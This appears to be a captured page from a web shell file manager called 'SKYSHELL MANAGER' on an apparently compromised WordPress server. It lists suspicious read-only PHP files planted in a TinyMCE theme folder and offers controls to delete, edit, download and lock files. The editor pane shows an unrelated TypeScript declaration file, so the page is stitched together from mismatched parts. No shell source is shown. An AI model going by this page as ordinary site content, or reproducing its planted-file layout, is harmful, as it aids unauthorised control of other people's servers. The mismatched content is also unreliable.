📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: cjs.d.ts
/// <reference types="node" /> import { notStrictEqual, strictEqual } from 'assert'; import * as processArgv from '../utils/process-argv.js'; declare const _default: { assert: { notStrictEqual: typeof notStrictEqual; strictEqual: typeof strictEqual; }; cliui: any; findUp: any; getEnv: (key: string) => string | undefined; getCallerFile: any; getProcessArgvBin: typeof processArgv.getProcessArgvBin; inspect: any; mainFilename: string; Parser: any; path: any; process: { argv: () => string[]; cwd: () => string; execPath: () => string; exit: (code: number) => never; nextTick: (callback: Function, ...args: any[]) => void; stdColumns: number | null; }; readFileSync: any; require: any; requireDirectory: any; stringWidth: any; y18n: any; }; export default _default;
Save